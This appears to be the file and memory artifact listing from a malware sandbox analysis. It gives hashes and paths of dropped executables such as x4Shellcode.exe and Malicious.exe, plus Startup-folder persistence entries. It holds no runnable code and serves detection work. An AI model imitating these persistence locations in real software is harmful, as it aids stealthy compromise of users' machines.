SHA512 2bbac87ebabfd5d81c2ca7e25defc4a5a6019e9e5d86f9cb4662df6de257aac0d73da1b89408f69ad319909d12c47f7cf96d0581d860a627d96ec2674beac629

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb6332ae9e8fec69c2236355e2638f9d
SHA1 71500d57fb304979afd6756f06d4b9a59f995eb7
SHA256 88e5ffe18fd4a772efce68f1b0db839846cafc42d36415508ad5356a44d38f32
SHA512 e87c864ba79bd7a10a62b55ad564cf3acb090e7d85707a6967497deeef5fcde1f0b4608ea8791bf81363ec583a0101d470d8f3cd2172ced8d4071d7f6c674aed

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fcbfea2bed3d0d2533fe957f0f83e35c
SHA1 70ca46e89e31d8918c482848cd566090aaffd910
SHA256 e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38
SHA512 d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 714bacb9b47ade6cac916935bf8e2fd8
SHA1 250094faf06a099c7da5ffc5cc8304c84f1d3061
SHA256 52b48a46211737488c95462fb118cf752b8863317776d40ce9e74b34d8444540
SHA512 0f5de5cd70438002a816117af08d316ebeceef089db4ed25d9424ec9b6ee9cc652cfdf485f17811ad865ebd1a5df1e46a180437809d284b67defb5cd36cb0c4b

C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe

MD5 1bb7940802b53faf639f5265e89a18b3
SHA1 46411569489a5bf3844b19ea507b9fa85987551a
SHA256 9c0ef273a15f37bcfda6bd266d6bc7b76050447aa7d4d44a0f1a52f66f44f996
SHA512 2a533a3b1da8eae721f995160796579b138394cf328630d5093203059f4a1e3318f04888edf7cc36a01db5303bc6537a38405b26408a83ce7eb926ab6c909575

C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe

MD5 082f413ea68e0f2d68fce0074c84c88c
SHA1 81c88c629961e3baad67c6b4b5113691c3d9cde5
SHA256 84605e359c091438ed592a1b73c0efbc583f4e6a03c51f8d49861d5e00c91dd1
SHA512 1da80720dd4c079cbafcae78f5497521245806e91424dd36b8a6c79c09813499100dbc7e5c290565d8fd50434f46e4acd9e23a6ad7d8deec29207c46829d3718

memory/4480-77-0x0000000000200000-0x000000000023C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 807e34150dfec5954368008d73b63da4
SHA1 4c0be21e0b0c812901464cf5a6948a8c8f534b71
SHA256 d58cac2eb66f898fb372dd993c4e7a677eef19e67f2e73e4048cceee2e90fd1c
SHA512 a481233a44a75b4122130925ff866feb7ac82719cccbc007e7475b9c32c46058120d9c1a550f53078fa0d5cbb9dcdf4d654c478a3a1b4286ccb73d3de761bf36

memory/4420-88-0x000001794AAF0000-0x000001794AC3F000-memory.dmp

C:\ProgramData\x4V5.2.exe

MD5 1d68a875800780540a7a10e5243a26c1
SHA1 62da3a00ce85933f766bb65b75baf44a1f16d059
SHA256 0cf0eb06b862e6a7b5a28fb4e8d2f80d05a6520f63f8e0bb5922e85c6b41b2f2
SHA512 b3566f4f2a404912a000834fa6f09681e717d3a0f87aa416eb81c233a7a82d94f7b8f65ef734cd277778ebb118f4ccf385fb71cc5a54ec5aa09e932f79ec9842

memory/1540-100-0x0000000000660000-0x000000000067C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa7849d1120fa94ceeed026ce00ca2c5
SHA1 a111f0e297e591ca486bb85c94515be0932020eb
SHA256 6a22e9ad970c9e4b5184dc3e4ba14da991a08e7d130394c8396471e809762dc5
SHA512 c124286cafe66563cdd03b58091ff08bfeca9fb7688756564c9603b5c49c78fc98a933c0030caa722e475226e1bdff0fbff413a398889b7fc7cd332ad07b6fbc

memory/408-111-0x000002266E250000-0x000002266E39F000-memory.dmp

C:\ProgramData\x4Shellcode.exe

MD5 8a7bee2c8cec6ac50bc42fe03d3231e6
SHA1 ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
SHA256 c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
SHA512 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5

memory/2496-129-0x000001FA19BE0000-0x000001FA19C0A000-memory.dmp

memory/2496-131-0x00007FF982120000-0x00007FF9821DD000-memory.dmp

memory/2496-130-0x00007FF9834E0000-0x00007FF9836E9000-memory.dmp

memory/1100-134-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1100-135-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1100-133-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1100-138-0x00007FF9834E0000-0x00007FF9836E9000-memory.dmp

memory/1100-139-0x00007FF982120000-0x00007FF9821DD000-memory.dmp

memory/1100-137-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1100-132-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1100-140-0x0000000140000000-0x0000000140008000-memory.dmp

memory/640-145-0x000001C880290000-0x000001C8802BC000-memory.dmp

memory/640-152-0x00007FF943570000-0x00007FF943580000-memory.dmp

memory/696-163-0x00007FF943570000-0x00007FF943580000-memory.dmp

memory/996-174-0x00007FF943570000-0x00007FF943580000-memory.dmp

memory/472-185-0x00007FF943570000-0x00007FF943580000-memory.dmp

memory/540-189-0x0000020EF7690000-0x0000020EF76BC000-memory.dmp

memory/472-184-0x000001E282EB0000-0x000001E282EDC000-memory.dmp

memory/472-178-0x000001E282EB0000-0x000001E282EDC000-memory.dmp

memory/996-173-0x0000011F59ED0000-0x0000011F59EFC000-memory.dmp

memory/996-167-0x0000011F59ED0000-0x0000011F59EFC000-memory.dmp

memory/696-162-0x0000029426260000-0x000002942628C000-memory.dmp

memory/696-156-0x0000029426260000-0x000002942628C000-memory.dmp

memory/640-151-0x000001C880290000-0x000001C8802BC000-memory.dmp

memory/640-144-0x000001C880290000-0x000001C8802BC000-memory.dmp

memory/640-143-0x000001C880260000-0x000001C880286000-memory.dmp

C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe

MD5 89e3cb825a0a2a7fa4888ea66802dc13
SHA1 61025242fda034cd76f7c44860327465b303f69a
SHA256 47071488c86f41bcb9e15ee233484afe5dd801d40ecc989351254e704d6b2480
SHA512 f76c6e2fbc69bde418fd39d66f12ae84e61d30217a32b9f01dfdc8cbf14318a4a6435cdcdc35ca83b162dee99eb5a9667b1f4dff968e7d873d39abcf0703c843

memory/2480-872-0x0000000000390000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 051a74485331f9d9f5014e58ec71566c
SHA1 4ed0256a84f2e95609a0b4d5c249bca624db8fe4
SHA256 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888
SHA512 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 856900844f6f1c326c89d0bcfb2f0c28
SHA1 1caad440d46fa8c0cbed4822b4be2bbdddba97c2
SHA256 ae24414ec53b3ae43ddbf1ff7b6643f8bf45281406f6415742f4305360d70a32
SHA512 ed8f421e151d797b33440dd0ddb6d6a5ec93fe7806ad82c60af3f77d545cf5dc319bce67804bd0613bb551a3f01648ec0d1918805dc7342145c8bb23ad12cab4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f0e62045515b66d0a0105abc22dbf19
SHA1 894d685122f3f3c9a3457df2f0b12b0e851b394c
SHA256 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319
SHA512 f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b0a85f07903eaad4aace8865ff28679f
SHA1 caa147464cf2e31bf9b482c3ba3c5c71951566d1
SHA256 c85c7915e0bcc6cc3d7dd2f6b9d9e4f9a3cf0ccefa043b1c500facac8428bfd5
SHA512 7a650a74a049e71b748f60614723de2b9d2385a0f404606bcb22ae807e22a74c53cf672df9e7a23605dfff37865443a5899eafea323134a818eb59c96e0f94bd

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe

MD5 10194be78216b8b290e3d8d02055957b
SHA1 d5b42c116a56ca0fb507de577db183e5e740fe77
SHA256 33ba879b2eec97789475dfea751a38002c0b89d7f61f610b6ead2fe18d6ee7e5
SHA512 35b55168d8fb6632e176eaf8d74e9e8c50b27c0057e0c72098e81df55d6bd969a53c9138ef2b3486f5a32186d4294dd2e9c50d4f5842572dad698237fc9021ed

memory/3672-1154-0x0000000000DB0000-0x0000000000DCA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe

MD5 885df3eabb13cba468d3fe060b7561b0
SHA1 9deeff0eabfc2f9ca0c8b2cd07a77565d0c5a376
SHA256 8deb77e4f3cd316b63a1cefc208f9598533543639e143ea9867c4a93ebfe9de5
SHA512 95f2b9e9a5e797508f28006163c737fb1b67c4ad7337fe65a6b63a3c7483f2014c66201f74bf1181d1add3414953eb4080be478b9fab7d8f4c30fb72d5fe540e

memory/4672-1181-0x0000000000AA0000-0x0000000000B38000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e8a7ab7bae6a69946da69507ee7ae7b0
SHA1 b367c72fa4948493819e1c32c32239aa6e78c252
SHA256 cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272
SHA512 89b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683

memory/4672-1206-0x000000001CB10000-0x000000001CB4A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 190b28f40c0edd3cc08d0fd3aca4779a
SHA1 425b98532b6a18aa2baece47605f1cf6c8cfbd11
SHA256 8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce
SHA512 8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 04493ed4421328d5e40252891bfe515a
SHA1 ab8a4e3909ff849549ea989049ed30b490f274e7
SHA256 3b14b48326a1201fc8b9667201c15392e52f7f5819c2aadafe19cbb72b08be51
SHA512 c8ca89143763a72f4ce8f10ffa2e161b59d41454bad0f71fcb4c7e9c8861a5d99bdc787907761bfb8439afad1f0557a1338bbb1054f5810de807633f515d5a76

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7e46b66e9b3609911fdf14d0a418d978
SHA1 acd24b967cc801ecda3ae93dd0be6fd2a2ee5c9d
SHA256 81a642f2a14ab788978ed3a247432048cb6feb5be3cd40e276022562a4b7aa06
SHA512 55b3f342fd0e097dd5028159d82d0b2c9f24669e334cc020c8c054e888157f2d67d6e618517900f4ee9a1f107c8ae6f9ae55d2f09833f6565964cfaa7fc0777e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a79484020d1fe82f2f791cc2582b5dec
SHA1 1c74da2b600fe1ac4ef9b41993b36fa6241c9e86
SHA256 1c01ed1958207ff2e3a14430bd89b912a0ad28191817767764454ba0be1d4344
SHA512 e2a0bd264bc608c67eddfc333672b7cc201c35efd224bbc7f299a3fae6c3d18c8974fe8788dd90508a1f1b191ec53a0c8624c6285b011467ce71c4b82626fd04

memory/1540-1935-0x000000001B490000-0x000000001B49E000-memory.dmp

memory/3672-1943-0x000000001C8F0000-0x000000001C8FA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x4Malicious.log

MD5 2cbbb74b7da1f720b48ed31085cbd5b8
SHA1 79caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256 e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512 ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk

MD5 7350b6b2078259137bddad4ac88b96f1
SHA1 d337d07890b665dd75068caa974847d451987225
SHA256 1bd7ca6a81e76575f13076f3e80cdf95313a3ea0bf92c93babdf6d04e13cb606
SHA512 795ac4f3fd22e89a068bd7e8cb140af6bfcd13738969ea997291b80b5f26177a59f5f5f907f95edcd2cbea0e2127a997f2c77e56ddf89921bf608f7d6114869c

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 8a86027e38ee15c51ee8865e6779ab0a
SHA1 19cdd9b88623ea87477cebe7a91b63d48b07b32c
SHA256 8210ee235cdf19788bc17d4ce419f1d79151b9aeaabf87a0ba7c6218acffc960
SHA512 1ebf96a07b29fe9d70216fbbd5ba86dacca0e87b0416c2318e608068b224f80e03aae2c2f9f3302889d65f4623d25fe7d1ffa2c1324ae98ed60106c2fc9f46d2

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 cb76d822faa7e952296300763bed64cf
SHA1 bd5477001d6f96ea7b640c2d0da9e0bc293bc090
SHA256 a4e304483c0ee4a73013c996f3bf98923ccef56381faed53f3ce72833ecf8ded
SHA512 12c835c94dd83ce7fee4439284f8d17d44a375e0de2d672370d7842f30c1efffd855be07a65756225e72405f4ed629936116b8b14e81d8147ab573bae64ebbf7

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 1e5ca1a3b67a5dfca2d4cdaa4b09778e
SHA1 532c39f79f0dc03756f49cf167eb4055d6e16f98
SHA256 0f7cb79b5948a8aeefaae9432a1123baf8cedb5245d240d066652cb9019cebcf
SHA512 8327d747cdf5e0376310def9d4f7cb2679b471be4224944bd61effc4565e3db6a4e2a9dda4ae855d60110f672b1386f944b673e421b2e29f4a87d0c9133bc581

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 73f929ae27a3b93357b9eb4706764d5e
SHA1 492d30941e5dbb69c560001184a5131775ce35d9
SHA256 7dec5e315a78b45e6cab16960c46d768482866a142a88bd6bad1c5a3e213d549
SHA512 bb82b73be2cd8d766a6e2eaf024770e7463d570d7207ca8b9868534757fd06b219c32627fc69a6413ee30ee23d7d76c41936a512b58a7e413de993083979a7e8

C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

MD5 a88cbd0d52f4c6c36104206331ce657d
SHA1 4fbd087d18822c11f13a718c7ce26889f05c4060
SHA256 e1e9094acc4260860125efb556839783182cfb401aa059e590e91a1619b5b665
SHA512 48d360777f4156c3aa8404f15f92e08c99f1c1ba304bd4368b0486ee8c915427d0f3836b958ea4eb64be4e9d4a57023def86b115ed6d74403e66845adab876cb

C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

MD5 1b1ea000d772f4e993de6834c17b755d
SHA1 913f449a9932c0bd42eb748487bf8cfd8134c4a9
SHA256 6449d0a3f0356b243a5b5b6570036f0bc3471ec8c764d60c23ba155013beb7f4
SHA512 ab316d98bd21cd28612ecbd381202b9e65ccebca770ec9a59b0d79dafa9bdcf4a58941532035c3a48a604fdaf3bfcd4bff6b4981e7c56d67ce11b6c2d907b5a5

C:\Windows\Panther\UnattendGC\diagwrn.xml

MD5 26f17ae18099bfd0e81964751c8f5953
SHA1 29f8f79c7d3ac8dfd402ae3a282141b7d4c07d32
SHA256 730450b0d680be5cdb5de85546af077128cb24a42c6f419b86df8b072219dc7c
SHA512 879d1a2c8a1c32f0db84b840a72c257ecb7ec64435874b14d34073610227b0e078b27a8bb6f37e36e21442771daaf950ff9bd24e452eafdea5c196b607f872b2

C:\Windows\Panther\UnattendGC\diagerr.xml

MD5 4c23ed218b1b803aa3772d963d486fc4
SHA1 26c5a361572a4bbbc7e237d5d25feba2093c9f12
SHA256 d5aaa288fb1b7c3e00580f6fc5d580ba25d1a36721d479ea068625056ed85d05
SHA512 97967f330577cd913eee1f6f687799b6a73d2b4ec39eebcabdb910d3b25aa8fa81bfa88d8bd84a78d0f005d1ab789f60fa346852b8bd134f622f27f094d7e3fc

C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 b0a40f6847934b610c24822c5c1e60b4
SHA1 7a984562d0765a185ab4af0f6b574b326410e7eb
SHA256 baa3c6350471601390dda37570a20a23567c582df132eb0fbe997f36ac831da2
SHA512 05453981b9bd66438c4e707a2763e00f58929f41bc2802f01ba240f3d7d46a6f2a7be9c28192ba783ef42c33d0f1e50766a70edbd61e8c48f299e0da75712a8f

C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 2e286dd0367aaf12ac7a61923b48c1e6
SHA1 6757cfcc28a86552fa5d535bd8e2c247ef7b722d
SHA256 d33e3afd37e7150f69f78c16355a039925bb53b624587ef37727f8954c801973
SHA512 c347fd6731e59da059863918e3bafa07bd50ea8f3e6f88ad8837b3301c3971376a0665d081df3d8501ae5538a306a97f06e237e679ea3bd725256cb497307511